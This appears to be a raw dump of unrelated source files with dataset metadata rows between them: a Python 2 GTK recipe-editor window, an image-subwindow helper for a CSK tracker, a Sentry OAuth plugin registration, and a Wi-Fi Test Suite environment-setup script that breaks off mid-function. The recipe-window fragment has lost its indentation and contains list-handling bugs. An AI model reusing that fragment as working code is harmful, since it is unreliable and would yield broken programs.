Ammountlbl = ""
NewRecipe = None
"""
create indexer to communicate with recipe.py
self.'NAME' = Indexer()----creates an indexer
"""
def __init__(self):
"""
Constructor saves the recipe.glade file
Creates an indexer to use for creating and saving a recipe object
"""
self.gladefile = 'gui/recipe.glade'
#Global Varialbles
#IndexRecipe may be used to store an index number for Recipe objects
self.IndexRecipe = Recipe_Get_New_index()
#create new Recipe object to hold recipe. Unique key is name of
#object. Object is created as soon as the window opens
#Currently just using the name 'Test Recipe' input for name of
#recipe by user. Possibly will change to use an automated system So only
#creates one recipe object that is reuse every time the program is ran.
self.indexer = Indexer()
def run(self, Edit):
self.wTree = gtk.glade.XML(self.gladefile, 'wndRecipe')
#dictionary of Handlers for events in Recipe GUI window
#including the method function to support that handle
# dic = {"Button Handler Name": sef.CorresondingFunctionTitle}
dic = { #"wndRecipe_close_cb" : self.ObjectDelete,
"btnFinish_click_cb" : self.lookAtFields,
"btnCancelForm_click_cb" : self.Exit,
"btnClearForm_click_cb" : self.clearAllFields,
"btnAddIngrd_clicked_cb" : self.Ingredients,
"btnProcedures_clicked_cb" : self.Procedures,
#"btnEdit_Ingredients_clicked_cb" : self.EditIngredients,
#"btnEditProcedures_clicked_cb" : self.EditProcedures,
#"wndRecipe_destroy_cb" : self.Exit,
}
#send dictionary of hanles to GUI
self.wTree.signal_autoconnect(dic)
#set window GUI for Recipe and open
self.wind = self.wTree.get_widget('wndRecipe')
self.setTrees()
#check to see if an ojbect was sent to be edit
if Edit:
self.TempNewRecipe = Edit
self.Editing = True
self.PopulateRecipe()
self.PopulateTrees(True, True)
print 'Recieve Recipe Object to edit'
else:
self.TempNewRecipe = self.indexer.get(Recipe, 'New Recipe')
self.Editing = False
print 'No Recipe Object passed to edit'
self.wind.show_now()
#-----------------------------------------------------------------------------------------------------------------------------
#Function to support the trees for ingredients and procedures
def setTrees(self, callback=None):
#create a tree list to hold ingredients
self.treRecipe_Ingredients = self.wTree.get_widget('treRecipe_Ingredients')
self.Recipe_Ingredient_List = setupList(self.treRecipe_Ingredients, ['Name','Type', 'Amount'], (str,str,str))
self.treRecipe_Procedures = self.wTree.get_widget('treRecipe_Procedures')
self.Recipe_Procedures_List = setupList(self.treRecipe_Procedures, ['Name', 'Time'], (str,str,))
def PopulateRecipe(self):
"""
Populate all the fields of the Recipe.
"""
self.wTree.get_widget('txtRecipeName').set_text(self.TempNewRecipe.name)
self.wTree.get_widget('txtRecipeStyle').set_text(self.TempNewRecipe.style)
self.wTree.get_widget('txtBatchSize').set_text(self.TempNewRecipe.batch_size)
self.wTree.get_widget('txtBoilTime').set_text(self.TempNewRecipe.boil_time)
self.PopulateTrees(True, True)
def PopulateTrees(self, Ingd, Proc):
if Proc:
self.Recipe_Procedures_List.clear()
for i in self.TempNewRecipe.Procedures:
self.Recipe_Procedures_List.insert(0,[i.name, "%s %s" % (i.timing_delta, i.time_unit)])
if Ingd:
self.Recipe_Ingredient_List.clear()
for i in self.TempNewRecipe.RecipeIngredients:
self.Recipe_Ingredient_List.append([i.name, i.__class__.__name__,
"%s %s" % (i.recipeAmount, i.stockUnit)])
#-----------------------------------------------------------------------------------------------------------------------------
#Functions to support the new recipe window when creating a new window.
def Procedures(self, callback):
"""
Call Procedures() sub-class.
"""
#call Procedures class
self.procedure = ProcedureWindow()
if self.Editing:
self.procedure.run(self.TempNewRecipe, self.Editing)
else:
self.procedure.run(self.TempNewRecipe)
#re-populate the procedure tree
self.PopulateTrees(False, True)
def Ingredients(self, callback):
"""
Call the Ingredient class to handle adding ingredients to the new recipe
Call the Ingredient class to handle edits to the ingredients stored in new recipe
If Editing send the new recipe object and True to the Ingredient class
Else just send the new recipe object
"""
self.ingredients = IngredientWindow()
if self.Editing:
self.ingredients.run(self.TempNewRecipe, self.Editing)
else:
self.ingredients.run(self.TempNewRecipe)
#re-populate the ingredients tree
self.PopulateTrees(True, False)
def lookAtFields(self,callback):
"""
Function that supports the Finish button.
Function stores and creaates new Recipe Object using The indexer
created in the constructor.
---------------------------------------------------------------
See Indexer: above for notes
Use a variable to store index object
Manipulate object variables or use functions as
Variable = self.indeser.get.........
Variable.ObjectClassVariable = such and such
Variable.ObjectClassFunction()
"""
#create variable to hold text input fro GUI text boxes
RecipeNameBox = self.wTree.get_widget('txtRecipeName')
RecipeStyleBox = self.wTree.get_widget('txtRecipeStyle')
BatchSize = self.wTree.get_widget('txtBatchSize')
BoilTime = self.wTree.get_widget('txtBoilTime')
#ListofIngredients = self.Recipe_Ingredient_List.get_selection()
#Set Created Recipe Object variables to inputs
self.TempNewRecipe.name = RecipeNameBox.get_text()
self.TempNewRecipe.style = RecipeStyleBox.get_text()
self.TempNewRecipe.batch_size = BatchSize.get_text()
self.TempNewRecipe.boil_time = BoilTime.get_text()
#test purposes to see if function is read and used
print 'reach look at fields'
#test purposes to see if inputs are correct and stored
print self.TempNewRecipe.name, self.TempNewRecipe.style, self.TempNewRecipe.batch_size, self.TempNewRecipe.boil_time
#Create new recipe object to store the new recipe.
#Delete TempNewRecipe. For a new unique object is created
#to store the new recipe.
#If editing an object do not create a new object and bypass this code
if self.Editing:
print 'Not Editing No need to create new recipe object'
else:
self.NewRecipe = self.indexer.get(Recipe, self.TempNewRecipe.name)
self.NewRecipe.swapRecipeObjects(self.TempNewRecipe)
self.Exit()
#-----------------------------------------------------------------------------------------------------------------------------
#These functions work for both new recipe and edit recipe functionality.
def clearAllFields(self, callback):
"""
Function that supports the Clear All Recipe Form button.
Clears all text fields in the Recipe Form
"""
self.wTree.get_widget('txtRecipeName').set_text('')
self.wTree.get_widget('txtRecipeStyle').set_text('')
self.wTree.get_widget('txtBatchSize').set_text('')
self.wTree.get_widget('txtBoilTime').set_text('')
#clear the ingredient list tree
self.Recipe_Ingredient_List.clear()
self.Recipe_Procedures_List.clear()
for i in self.TempNewRecipe.RecipeIngredients:
self.TempNewRecipe.RecipeIngredients.Remove(i)
for i in self.TempNewRecipe.Procedures:
self.TempNewRecipe.Procedures.Remove(i)
print 'reach clear all fields'
def ObjectDelete(self, callback = None):
"""
Delete Recipe Object
"""
if self.Editing:
print 'editing an object no deletion necessary'
else:
self.indexer.deleteObject(Recipe, 'New Recipe')
self.TempNewRecipe = None
print 'Object TempNewRecipe Deleted'
def Exit(self, callback = None):
"""
Function to handle quit
"""
self.ObjectDelete()
self.wind.destroy()
#return self.TempNewRecipe
print 'exit Recipe'
| UTF-8 | Python | false | false | 11,163 | py | 18 | wndRecipe.py | 14 | 0.669802 | 0.6681 | 0 | 294 | 36.969388 | 126 |
xujinzh/CSK | 18,133,351,958,404 | 057464e6a48599770f4fa8d8f30752fec5238fc4 | 388365862871297770de5e7c717f7b2354a99936 | /utils/get_subwindow.py | 3a416373aabbdd5e4a5f474b3f715bfe5f9354ee | [
"BSD-2-Clause"
]
| permissive | https://github.com/xujinzh/CSK | fa66232f42db0f72da47dc83eac497e65077bd34 | 136002da069d300fc2da9ae8530861818087ff40 | refs/heads/main | 2023-01-06T08:33:05.706746 | 2020-11-13T10:22:10 | 2020-11-13T10:22:10 | 303,584,852 | 5 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Jinzhong Xu
# @Contact : jinzhongxu@csu.ac.cn
# @Time : 10/12/2020 2:23 PM
# @File : get_subwindow.py
# @Software: PyCharm
import pylab
import os
from matplotlib import image as mpimg
import numpy as np
from utils import rgb2gray
from matplotlib import pyplot as plt
def get_subwindow(im, pos, sz, cos_window):
"""
使用 replication padding 从图像中获得子窗口。子窗口以 [y, x] 为坐标中心,大小为 [height, width].
如果子窗口超过图像边界,则复制图像的边界像素值。获得的子窗口将使用余弦窗口标准化到 [-0.5, 0.5]
:param im: 输入图像
:param pos: 子窗口中心点坐标 [y, x]
:param sz: 子窗口大小 [height, width]
:param cos_window: 余弦子窗口矩阵
:return: 返回经过余弦子窗口截取的图像矩形框部分
"""
# 如果不是高、宽组成的数组,而是一个一维数值,则转化为一个数组
# 目标是子窗矩形化
if pylab.isscalar(sz): # square sub-window
sz = [sz, sz]
# 以 pos 为中心,以 sz 为窗口大小建立子窗
ys = pylab.floor(pos[0]) + pylab.arange(sz[0], dtype=int) - pylab.floor(sz[0] / 2)
xs = pylab.floor(pos[1]) + pylab.arange(sz[1], dtype=int) - pylab.floor(sz[1] / 2)
ys = ys.astype(int)
xs = xs.astype(int)
# 如果子窗超过坐标,则设置为边界值
ys[ys < 0] = 0
ys[ys >= im.shape[0]] = im.shape[0] - 1
xs[xs < 0] = 0
xs[xs >= im.shape[1]] = im.shape[1] - 1
# 提取子窗剪切的图像块
out = im[pylab.ix_(ys, xs)]
# 将图像像素值从 [0, 1] 平移到 [-0.5, 0.5]
out = out.astype(pylab.float64) - 0.5
# 余弦窗口化,论文公式 (18)
return pylab.multiply(cos_window, out)
if __name__ == '__main__':
image_path = r'..\data\surfer\imgs'
image_list = os.listdir(image_path)
image = os.path.join(image_path, image_list[0])
img = mpimg.imread(image)
gray = rgb2gray.rgb2gray(rgb_image=img)
position = np.array([152., 286.])
size = np.array([35., 32.])
cos_window = pylab.outer(pylab.hanning(size[0]), pylab.hanning(size[1]))
result = get_subwindow(im=gray, pos=position, sz=size, cos_window=cos_window)
print(pylab.hanning(size[0]))
print(cos_window)
plt.imshow(result)
plt.show()
| UTF-8 | Python | false | false | 2,437 | py | 14 | get_subwindow.py | 12 | 0.600198 | 0.569025 | 0 | 63 | 30.079365 | 86 |
77629296/sentry_auth_chy | 4,483,945,898,586 | 88dbdec71605fb8d1368755e9b87406b4aa5b876 | 6a7f43215d392743648a23f159291436072f8e5f | /sentry_auth_chy/__init__.py | 5c1af97bce6dfb798f0f841960cba1b86960431d | [
"Apache-2.0"
]
| permissive | https://github.com/77629296/sentry_auth_chy | 7eba2eb0d2bb946521423b30def42320ca654f10 | 042cf650c044ff861b750122c8c35252b49ce8e5 | refs/heads/master | 2022-12-02T20:37:45.512568 | 2020-08-11T11:38:54 | 2020-08-11T11:38:54 | 286,728,533 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import absolute_import
from sentry.auth import register
from .provider import ChyOAuth2Provider
register('chy', ChyOAuth2Provider)
| UTF-8 | Python | false | false | 150 | py | 3 | __init__.py | 2 | 0.806667 | 0.793333 | 0 | 7 | 20.428571 | 39 |
WFA-HarshMadhiwalla/Wi-FiTestSuite-UCC | 13,297,218,764,215 | 15b30409437a72a24ef597d294437a26d9483949 | 49de835262f53fa622637985d9f59e58cd87d503 | /python/InitTestEnv.py | fb2c5bf8d26d7b5b30af52bad85849c9c832bc6a | [
"ISC"
]
| permissive | https://github.com/WFA-HarshMadhiwalla/Wi-FiTestSuite-UCC | e7cbaaceb900092bd77785f33dd4a5d1107f5845 | 3384478abb92ad29dfb658abdf89dbd7064ce16f | refs/heads/master | 2020-04-05T02:36:48.489688 | 2016-10-18T23:33:51 | 2016-10-18T23:33:51 | 41,568,632 | 0 | 0 | null | true | 2015-08-28T20:52:25 | 2015-08-28T20:52:25 | 2015-08-27T06:32:10 | 2015-08-25T18:28:01 | 1,229 | 0 | 0 | 0 | null | null | null | ###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
#!/usr/bin/env python
import os, sys
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import pprint
import xml.dom.minidom
from xml.dom.minidom import Node
import HTML
from decimal import Decimal
### Input Files ####
# File names below are Windows-style fragments that InitTestEnv() prepends
# with uccPath; the backslashes are escaped explicitly ("\\") because forms
# like "\M" are invalid escape sequences (DeprecationWarning today, a
# SyntaxError in future Python).  Runtime values are unchanged.
MasterTestInfo = "\\MasterTestInfo.xml"
DUTInfoFile = "\\DUTInfo.txt"
TestbedAPFile = "\\802.11n-Testbed-APs.txt"
InitFile = "\\init_802.11n.txt"
RADIUSServer = "\\RADIUS-Servers.txt"
STAMACAddress = "\\STA_MAC_Addresses.txt"
APMACAddress = "\\AP_MAC_Addresses.txt"
# Certification program name, taken from the environment (may be None when
# PROG_NAME is unset; InitTestEnv() overwrites it with its progName argument).
ProgName = os.getenv("PROG_NAME")
TestbedAPList = "\\TestbedAPNames.txt"
### Output Files ####
InitEnvLogFile = "InitEnvLog.log"
# File which would be used by UCC core
UCCInitEnvFile = "\\InitEnv.txt"
LogFile = ""
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
# Variable list shared with the rest of the module; reset by InitTestEnv()
VarList = {}
# List of EAP methods recognized for enterprise-security test setups
EAPList = ["TLS", "TTLS", "PEAP0", "FAST", "PEAP1", "SIM", "AKA", "AKA'", "PWD"]
# List of WPS Config Methods
WPSConfigList = ["WPS_Keypad", "WPS_Display", "WPS_PushButton", "WPS_Label"]
# Default command file path (overwritten by InitTestEnv() with cmdPath)
uccPath = "..\\cmds"
bandSelectionList = {}
# Parsed MasterTestInfo.xml DOM; set by InitTestEnv()
doc = ""
# Global object to handle test ENV variables (replaced with an envVariables
# instance by InitTestEnv())
testEnvVariables = ""
# Testbed-qualification mode settings (set by InitTestEnv() when q != 0)
qual = 0
QualAP = ""
QualSTA = ""
# Main function
def InitTestEnv(testID, cmdPath, progName, initFile, TBFile, q=0, qualAP="", qualSTA=""):
    """Initialize the UCC test environment for a single test case.

    Parses MasterTestInfo.xml, reads the DUT info file, gathers testbed
    device / server / sniffer settings for the given test ID, and finally
    writes the InitEnv file consumed by the UCC core plus a download log.

    Parameters:
        testID   -- test case identifier used to look up nodes in MasterTestInfo.xml
        cmdPath  -- path to the UCC command files directory (stored in global uccPath)
        progName -- certification program name, e.g. "P2P", "TDLS", "HS2-R2", "NAN"
        initFile -- per-program init file name (bare name; a leading "\\" is added)
        TBFile   -- testbed AP file name (bare name; a leading "\\" is added)
        q        -- non-zero enables testbed-qualification mode
        qualAP   -- qualification AP name (used only when q is truthy)
        qualSTA  -- qualification STA name (used only when q is truthy)

    NOTE(review): this function operates almost entirely through module-level
    globals and helper functions defined elsewhere in this file (InitLog,
    ReadDUTInfo, GetCAPIFileNames, ...); it must run before those globals are
    consumed by other code.
    """
    global MasterTestInfo, DUTInfoFile, doc, InitFile, TestbedAPFile, ProgName, uccPath, testEnvVariables, QualAP, QualSTA, qual, VarList
    uccPath = cmdPath
    VarList = {}
    # Parse the master test info XML once; the DOM is kept in the module
    # global 'doc' (presumably queried by the Get* helpers -- confirm).
    doc = xml.dom.minidom.parse(uccPath + MasterTestInfo)
    # Store file names as leading-backslash fragments, matching the style of
    # the other file-name globals defined at module scope.
    InitFile = "\\" + initFile
    ProgName = progName
    TestbedAPFile = "\\" + TBFile
    TestID = testID
    testEnvVariables = envVariables()
    # For test bed qualification only
    if q:
        qual = q
        QualAP = qualAP
        QualSTA = qualSTA
    #TestID=TestID.split('_')[0]
    InitLog(InitEnvLogFile)
    ReadDUTInfo(DUTInfoFile, TestID)
    LogMsg("Input Files - \n MasterTestInfo = %s \n DUTInfoFile =%s \n" %(MasterTestInfo, DUTInfoFile))
    # Check for WEP support: the DUT info value is compared as the string "1"
    # (values presumably come from DUTInfo.txt as text -- confirm).  When the
    # master XML has a "<TestID>-WEP" node, switch to the WEP variant of the
    # test case.
    if getattr(dutInfoObject, "WEP") == "1":
        LogMsg("WEP is supported by DUT ")
        if check_isNode_Level1("%s-%s" % (TestID, "WEP")):
            TestID = ("%s-%s"%(TestID, "WEP"))
            LogMsg("Test ID = %s" % TestID)
    LogMsg("----Test ID = %s-------" % TestID)
    GetCAPIFileNames(TestID)
    GetTestbedDeviceInfo(TestID)
    # Peer-to-peer style programs need extra P2P variables.
    if ProgName == "P2P" or ProgName == "WFD" or ProgName == "WFDS" or ProgName == "NAN":
        GetP2PVariables(TestID)
    # Programs other than P2P/TDLS/NAN use a RADIUS server / supplicant.
    if not (ProgName == "P2P" or ProgName == "TDLS" or ProgName == "NAN"):
        GetServerSupplicantInfo(TestID)
    if ProgName == "HS2-R2":
        GetSubscriptionServerInfo(TestID)
    GetSnifferInfo(TestID)
    LogMsg(dutInfoObject)
    LogMsg(testEnvVariables)
    GetOtherVariables(TestID)
    # Emit the InitEnv file read by the UCC core, then the download log.
    createUCCInitEnvFile(UCCInitEnvFile)
    createDownloadLog()
#
# Class: dutInfo
# This class holds all the required information about DUT
#
class dutInfo:
    """Holds all the required information about the DUT (Device Under Test).

    Attributes mirror the constructor parameters one-for-one (except that
    parameter ``preAuth`` is stored as ``PreAuth``).  Most capability flags
    default to 0 (unsupported); ``WTSSupport`` and ``WTSTrafficSupport``
    default to 1.  Values are later overwritten from the DUT info file
    (NOTE(review): elsewhere in this module ``WEP`` is compared against the
    string "1", so flags may hold strings rather than ints after loading --
    confirm against ReadDUTInfo).

    The previous no-op ``__setattr__`` override (it only did
    ``self.__dict__[attr] = value``, i.e. exactly the default behavior) has
    been removed.
    """
    def __init__(self,
                 DUTType="",
                 DUTCategory="",
                 DUTBand="",
                 TestCaseID="",
                 DUTEAPMethod="",
                 WEP=0,
                 preAuth=0,
                 _11h=0,
                 SupportedChannelWidth=0,
                 Streams=0,
                 Greenfield=0,
                 SGI20=0,
                 SGI40=0,
                 RIFS_TX=0,
                 Coexistence_2040=0,
                 STBC_RX=0,
                 STBC_TX=0,
                 MCS32=0,
                 WTSSupport=1,
                 WTSTrafficSupport=1,
                 OBSS=0,
                 AMPDU_TX=0,
                 AP_Concurrent=0,
                 TDLSDiscReq=0,
                 PUSleepSTA=0,
                 _11d=0,
                 STAUT_PM=0,
                 Open_Mode=0,
                 Mixedmode_WPA2WPA=0,
                 PMF_OOB=0,
                 ASD=0,
                 AC_VO=0,
                 AC_VI=0,
                 AC_BE=0,
                 AC_BK=0):
        # Identity / general information
        self.DUTType = DUTType
        self.DUTCategory = DUTCategory
        self.DUTBand = DUTBand
        self.TestCaseID = TestCaseID
        self.DUTEAPMethod = DUTEAPMethod
        # Security / regulatory capabilities
        self.WEP = WEP
        self.PreAuth = preAuth          # note: parameter is 'preAuth'
        self._11h = _11h
        # 802.11n PHY/MAC capabilities
        self.SupportedChannelWidth = SupportedChannelWidth
        self.Streams = Streams
        self.Greenfield = Greenfield
        self.SGI20 = SGI20
        self.SGI40 = SGI40
        self.RIFS_TX = RIFS_TX
        self.Coexistence_2040 = Coexistence_2040
        self.STBC_RX = STBC_RX
        self.STBC_TX = STBC_TX
        self.MCS32 = MCS32
        self.WTSSupport = WTSSupport
        self.WTSTrafficSupport = WTSTrafficSupport
        self.OBSS = OBSS
        self.AMPDU_TX = AMPDU_TX
        self.AP_Concurrent = AP_Concurrent
        self._11d = _11d
        self.STAUT_PM = STAUT_PM
        self.Open_Mode = Open_Mode
        self.Mixedmode_WPA2WPA = Mixedmode_WPA2WPA
        self.PMF_OOB = PMF_OOB
        #TDLS Specific
        self.TDLSDiscReq = TDLSDiscReq
        self.PUSleepSTA = PUSleepSTA
        #ASD Device
        self.ASD = ASD
        #ASD AC stream support
        self.AC_VO = AC_VO
        self.AC_VI = AC_VI
        self.AC_BE = AC_BE
        self.AC_BK = AC_BK
    def __str__(self):
        """Return a multi-line human-readable summary (used by LogMsg)."""
        return ("""Type = %s
        Category = %s
        Band = %s
        EAP = %s
        TestCase = %s
        WEP = %s
        PreAuth = %s
        11h = %s
        WTS Support = %s
        WTS Traffic Support = %s
        11d = %s
        STAUT_PM = %s""" %
                (self.DUTType,
                 self.DUTCategory,
                 self.DUTBand,
                 self.DUTEAPMethod,
                 self.TestCaseID,
                 self.WEP,
                 self.PreAuth,
                 self._11h,
                 self.WTSSupport,
                 self.WTSTrafficSupport,
                 self._11d,
                 self.STAUT_PM))
#Global Object to handle DUT Information (filled in by ReadDUTInfo)
dutInfoObject = dutInfo()
#
# Class: testbedAP
# This class holds all the required variables for any testbed AP
#
class testbedAP:
    """One testbed access point: its name, its slot number in the UCC
    environment and its power state."""
    def __init__(self, Name="", Number=0, state="off"):
        self.Name = Name
        self.Number = Number
        self.State = state
    def formatAPUCC(self):
        """Render this AP as UCC define! lines (name, power port, state, IP)."""
        n = self.Number
        fields = (
            ("$AP%s" % n, self.Name),
            ("$AP%sPowerSwitchPort" % n, GetAPPortNumber(self.Name)),
            ("$AP%sState" % n, self.State),
            ("$AP%sIPAddress" % n, GetAPIPAddress(self.Name)),
        )
        return "\n\n" + "".join("define!%s!%s!\n" % pair for pair in fields)
    def __str__(self):
        summary = "AP Name = %s | AP Number = %s | AP Powerswitch Port = %s | AP IP Address = %s | AP State = %s"
        return summary % (self.Name, self.Number, GetAPPortNumber(self.Name), GetAPIPAddress(self.Name), self.State)
class server:
    """RADIUS server record plus the supplicant names used by the DUT and
    the testbed STAs."""
    def __init__(self, Name="-", IP=0, Port="-", Password="-", supplicant="-", tesbedsupplicant="-"):
        self.name = Name
        self.IP = IP
        self.Port = Port
        self.Password = Password
        self.Supplicant = supplicant
        self.STASupplicant = tesbedsupplicant
    def formatUCC(self):
        """Render the server settings as UCC define! lines."""
        pairs = (
            ("RADIUSIPAddress", self.IP),
            ("RADIUSPort", self.Port),
            ("RADIUSSharedSecret", self.Password),
            ("SupplicantName", self.Supplicant),
            ("STASupplicantName", self.STASupplicant),
        )
        return "\n\n" + "".join("define!$%s!%s!\n" % pair for pair in pairs)
    def __str__(self):
        template = "RADIUS Name = %s | RADIUS IP = %s | RADIUS Port = %s | RADIUS Shared Secret = %s | Supplicant = %s | Testbed STA Supplicant = %s"
        return template % (self.name, self.IP, self.Port, self.Password, self.Supplicant, self.STASupplicant)
#Global Object to handle server Information (filled in by GetServerSupplicantInfo)
serverInfo = server()
class envVariables:
    """Holds all the required variables for the test: channels, band, SSIDs,
    testbed STA names and the four CAPI script file names, plus the table of
    testbed APs (self.APs, name -> testbedAP).

    The AP list is read from the TestbedAPList file under uccPath; each
    listed name becomes one testbedAP entry. Note formatNameUCC() emits only
    STA1..STA3 — TSTA4/TSTA5 are held but never written to the init file.
    """
    global ProgName, uccPath
    def __init__(self,
                 Channel="",
                 Channel_1="",
                 Channel_2="",
                 Channel_3="",
                 Band="",
                 SSID="",
                 SSID_1="",
                 SSID_2="",
                 SSID_3="",
                 TSTA1="",
                 TSTA2="",
                 TSTA3="",
                 TSTA4="",
                 TSTA5="",
                 TestbedConfigCAPIFile="",
                 DUTConfigCAPIFile="",
                 STAConfigCAPIFile="",
                 WLANTestCAPIFile=""):
        self.Channel = Channel
        self.Channel_1 = Channel_1
        self.Channel_2 = Channel_2
        self.Channel_3 = Channel_3
        self.Band = Band
        self.SSID = SSID
        self.SSID_1 = SSID_1
        self.SSID_2 = SSID_2
        self.SSID_3 = SSID_3
        self.APs = {}
        # For each program, create a file 'TestbedAPNames.txt' in cmds folder and list the name of APs in that file
        # E.G., for 11n, create a file 'TestbedAPNames.txt' in cmds\WTS-11n folder with list of AP Names
        if os.path.exists(uccPath + TestbedAPList):
            # FIX: context manager — the old code leaked this file handle
            with open(uccPath + TestbedAPList, 'r') as APNames:
                for l in APNames.readlines():
                    n = l.rstrip("\n")
                    self.APs.setdefault(n, testbedAP(n))
        else:
            # FIX: function-call form prints identically on Python 2 but no
            # longer breaks the module on Python 3 (old code used the
            # Python-2-only print statement)
            print("No Testbed APs-")
        self.TSTA1 = TSTA1
        self.TSTA2 = TSTA2
        self.TSTA3 = TSTA3
        self.TSTA4 = TSTA4
        self.TSTA5 = TSTA5
        self.TestbedConfigCAPIFile = TestbedConfigCAPIFile
        self.DUTConfigCAPIFile = DUTConfigCAPIFile
        self.STAConfigCAPIFile = STAConfigCAPIFile
        self.WLANTestCAPIFile = WLANTestCAPIFile
    def __setattr__(self, attr, value):
        # Plain dict store; mirrors dutInfo.__setattr__
        self.__dict__[attr] = value
    def formatNameUCC(self):
        """Render the scalar variables as UCC define! lines (APs and server
        info are appended separately by createUCCInitEnvFile)."""
        return ("""define!$Channel!%s!\n
define!$Channel_1!%s!\n
define!$Channel_2!%s!\n
define!$Channel_3!%s!\n
define!$Band!%s!\n
define!$SSID!%s!\n
define!$SSID_1!%s!\n
define!$SSID_2!%s!\n
define!$SSID_3!%s!\n
define!$STA1!%s!\n
define!$STA2!%s!\n
define!$STA3!%s!\n
define!$TestbedConfigCAPIFile!%s!\n
define!$DUTConfigCAPIFile!%s!\n
define!$STAConfigCAPIFile!%s!\n
define!$WLANTestCAPIFile!%s!\n""" %
                (self.Channel,
                 self.Channel_1,
                 self.Channel_2,
                 self.Channel_3,
                 self.Band,
                 self.SSID,
                 self.SSID_1,
                 self.SSID_2,
                 self.SSID_3,
                 self.TSTA1,
                 self.TSTA2,
                 self.TSTA3,
                 self.TestbedConfigCAPIFile,
                 self.DUTConfigCAPIFile,
                 self.STAConfigCAPIFile,
                 self.WLANTestCAPIFile))
    def __str__(self):
        return ("""Channel = %s
Channel_1 = %s
Channel_2 = %s
Channel_3 = %s |
Band = %s |
SSID = %s
SSID_1 = %s
SSID_2 = %s
SSID_3 = %s |
STA1 - %s
STA2 - %s
STA3 - %s
Testbed File - %s
DUTConfig File - %s
STAConfig File - %s
WLANTest File - %s""" %
                (self.Channel,
                 self.Channel_1,
                 self.Channel_2,
                 self.Channel_3,
                 self.Band,
                 self.SSID,
                 self.SSID_1,
                 self.SSID_2,
                 self.SSID_3,
                 self.TSTA1,
                 self.TSTA2,
                 self.TSTA3,
                 self.TestbedConfigCAPIFile,
                 self.DUTConfigCAPIFile,
                 self.STAConfigCAPIFile,
                 self.WLANTestCAPIFile))
def InitLog(FileName):
    """
    Initializes the log file
    Opens *FileName* for writing (truncating any previous content) and
    binds it to the module-wide LogFile handle used by LogMsg().
    Parameters
    ----------
    FileName : str
    Returns
    -------
    Pass(1)/Fail(-1) : int
        always 1 in practice; open() raises on failure instead of
        returning -1
    """
    global LogFile
    LogFile = open(FileName, 'w')
    return 1
def LogMsg(Msg):
    """
    Writes the message to the log file
    Each entry is prefixed with a local-time stamp (HH-MM-SS_Mon-DD-YY).
    InitLog() must have been called first so LogFile exists.
    Parameters
    ----------
    Msg : str
        anything with a usable %s representation
    Returns
    -------
    void
    """
    global LogFile
    LogFile.write("\n %s - %s" %(time.strftime("%H-%M-%S_%b-%d-%y", time.localtime()), Msg))
    return
def createUCCInitEnvFile(filename):
    """
    Creates the Init Environment file for UCC core and writes all the
    required variables from class object of envVariables
    Also appends the AP definitions, the RADIUS/supplicant lines and every
    entry accumulated in VarList, then terminates the file with #EOF.
    Parameters
    ----------
    filename : str
        path relative to uccPath; the file is overwritten
    Returns
    -------
    void (despite the historical Pass/Fail contract, nothing is returned)
    """
    global ProgName
    # 11n only: preserve the previous run's $tcID as $prtcID (parent test
    # case id) by re-reading the file about to be overwritten
    if (ProgName == "N"):
        prtcID="0"
        if os.path.exists(uccPath+filename) == 1:
            InitEnvHd = open(uccPath+filename, 'r')
            FileCon = InitEnvHd.readlines()
            for line in FileCon:
                if "$tcID" in line:
                    LineCon=line.split("!")
                    prtcID = LineCon[2]
            InitEnvHd.close()
    LogMsg("Init file created --- > %s" % (uccPath+filename))
    uccInitFile = open(uccPath+filename, 'w')
    uccInitFile.write("# This is an auto generated file - %s \n# For test case - %s\n#DO NOT modify this file manually \n\n" %(time.strftime("%b-%d-%y_%H:%M:%S", time.localtime()), dutInfoObject.TestCaseID))
    uccInitFile.write("\ndefine!$tcID!%s!\n"%(dutInfoObject.TestCaseID))
    if (ProgName == "N"):
        uccInitFile.write("\ndefine!$prtcID!%s!\n"%(prtcID))
    uccInitFile.write(testEnvVariables.formatNameUCC())
    for p in testEnvVariables.APs:
        uccInitFile.write(testEnvVariables.APs[p].formatAPUCC())
    uccInitFile.write(serverInfo.formatUCC())
    #Writing other variables
    for var in VarList:
        uccInitFile.write("\ndefine!$%s!%s!\n"%(var, VarList[var]))
    uccInitFile.write("#EOF")
    uccInitFile.close()
    return
def ReadDUTInfo(filename, TestCaseID):
    """
    This Function reads the DUT Info (Band, DUT Type, Category) from
    DUTInfo.txt file and load them into the class object of envVariables
    It also resolves the DUT's EAP method (first supported entry of
    EAPList, default TTLS), flags not-applicable tests via
    VarList["TestNA"], and writes an HTML summary of optional-feature
    support to DUTFeatureInfoFile for the listed programs.
    Parameters
    ----------
    filename : str
    TestCaseID : str
    Returns
    -------
    Pass(1)/Fail(-1) : int
        always returns 1; missing keys come back as -1 from ReadMapFile
    """
    LogMsg("Read DUT Info Function")
    DUTFile = uccPath+filename
    dutInfoObject.__setattr__("DUTType", ReadMapFile(DUTFile, "DUTType", "!"))
    dutInfoObject.__setattr__("DUTBand", ReadMapFile(DUTFile, "DUTBand", "!"))
    dutInfoObject.__setattr__("DUTCategory", ReadMapFile(DUTFile, "DUTCategory", "!"))
    dutInfoObject.__setattr__("WEP", ReadMapFile(DUTFile, "WEP", "!"))
    dutInfoObject.__setattr__("PreAuth", ReadMapFile(DUTFile, "PreAuth", "!"))
    dutInfoObject.__setattr__("_11h", ReadMapFile(DUTFile, "11h", "!"))
    # 11n / MIMO capability flags
